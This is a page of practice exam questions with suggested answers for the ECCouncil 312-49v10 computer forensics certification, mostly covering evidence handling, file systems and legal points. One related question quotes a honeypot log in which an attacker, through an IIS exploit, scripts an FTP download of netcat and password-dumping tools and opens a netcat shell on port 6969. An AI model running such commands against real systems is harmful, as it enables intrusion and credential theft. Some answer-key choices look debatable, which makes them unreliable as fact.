ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 8

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 71

Report
Export
Collapse

How many sectors will a 125 KB file use in a FAT32 file system?

A.
32
A.
32
Answers
B.
16
B.
16
Answers
C.
256
C.
256
Answers
D.
25
D.
25
Answers
Suggested answer: C

Question 72

Report
Export
Collapse

You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?

A.
70 years
A.
70 years
Answers
B.
the life of the author
B.
the life of the author
Answers
C.
the life of the author plus 70 years
C.
the life of the author plus 70 years
Answers
D.
copyrights last forever
D.
copyrights last forever
Answers
Suggested answer: C

Question 73

Report
Export
Collapse

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?

A.
on the individual computer's ARP cache
A.
on the individual computer's ARP cache
Answers
B.
in the Web Server log files
B.
in the Web Server log files
Answers
C.
in the DHCP Server log files
C.
in the DHCP Server log files
Answers
D.
there is no way to determine the specific IP address
D.
there is no way to determine the specific IP address
Answers
Suggested answer: C

Question 74

Report
Export
Collapse

Bob has been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the System for a period of three weeks. However, law enforcement agencies were recoding his every activity and this was later presented as evidence.

The organization had used a Virtual Environment to trap Bob. What is a Virtual Environment?

A.
A Honeypot that traps hackers
A.
A Honeypot that traps hackers
Answers
B.
A system Using Trojaned commands
B.
A system Using Trojaned commands
Answers
C.
An environment set up after the user logs in
C.
An environment set up after the user logs in
Answers
D.
An environment set up before a user logs in
D.
An environment set up before a user logs in
Answers
Suggested answer: A

Question 75

Report
Export
Collapse

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software?

A.
Computer Forensics Tools and Validation Committee (CFTVC)
A.
Computer Forensics Tools and Validation Committee (CFTVC)
Answers
B.
Association of Computer Forensics Software Manufactures (ACFSM)
B.
Association of Computer Forensics Software Manufactures (ACFSM)
Answers
C.
National Institute of Standards and Technology (NIST)
C.
National Institute of Standards and Technology (NIST)
Answers
D.
Society for Valid Forensics Tools and Testing (SVFTT)
D.
Society for Valid Forensics Tools and Testing (SVFTT)
Answers
Suggested answer: C

Question 76

Report
Export
Collapse

With Regard to using an Antivirus scanner during a computer forensics investigation, You should:

A.
Scan the suspect hard drive before beginning an investigation
A.
Scan the suspect hard drive before beginning an investigation
Answers
B.
Never run a scan on your forensics workstation because it could change your systems configuration
B.
Never run a scan on your forensics workstation because it could change your systems configuration
Answers
C.
Scan your forensics workstation at intervals of no more than once every five minutes during an investigation
C.
Scan your forensics workstation at intervals of no more than once every five minutes during an investigation
Answers
D.
Scan your Forensics workstation before beginning an investigation
D.
Scan your Forensics workstation before beginning an investigation
Answers
Suggested answer: D

Question 77

Report
Export
Collapse

Windows identifies which application to open a file with by examining which of the following?

A.
The File extension
A.
The File extension
Answers
B.
The file attributes
B.
The file attributes
Answers
C.
The file Signature at the end of the file
C.
The file Signature at the end of the file
Answers
D.
The file signature at the beginning of the file
D.
The file signature at the beginning of the file
Answers
Suggested answer: A

Question 78

Report
Export
Collapse

You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?

A.
The tool hasn't been tested by the International Standards Organization (ISO)
A.
The tool hasn't been tested by the International Standards Organization (ISO)
Answers
B.
Only the local law enforcement should use the tool
B.
Only the local law enforcement should use the tool
Answers
C.
The total has not been reviewed and accepted by your peers
C.
The total has not been reviewed and accepted by your peers
Answers
D.
You are not certified for using the tool
D.
You are not certified for using the tool
Answers
Suggested answer: C

Question 79

Report
Export
Collapse

Which of the following is NOT a graphics file?

A.
Picture1.tga
A.
Picture1.tga
Answers
B.
Picture2.bmp
B.
Picture2.bmp
Answers
C.
Picture3.nfo
C.
Picture3.nfo
Answers
D.
Picture4.psd
D.
Picture4.psd
Answers
Suggested answer: C

Question 80

Report
Export
Collapse

When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level of work does not increase beyond what was originally expected.

A.
Hard Drive Failure
A.
Hard Drive Failure
Answers
B.
Scope Creep
B.
Scope Creep
Answers
C.
Unauthorized expenses
C.
Unauthorized expenses
Answers
D.
Overzealous marketing
D.
Overzealous marketing
Answers
Suggested answer: B
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms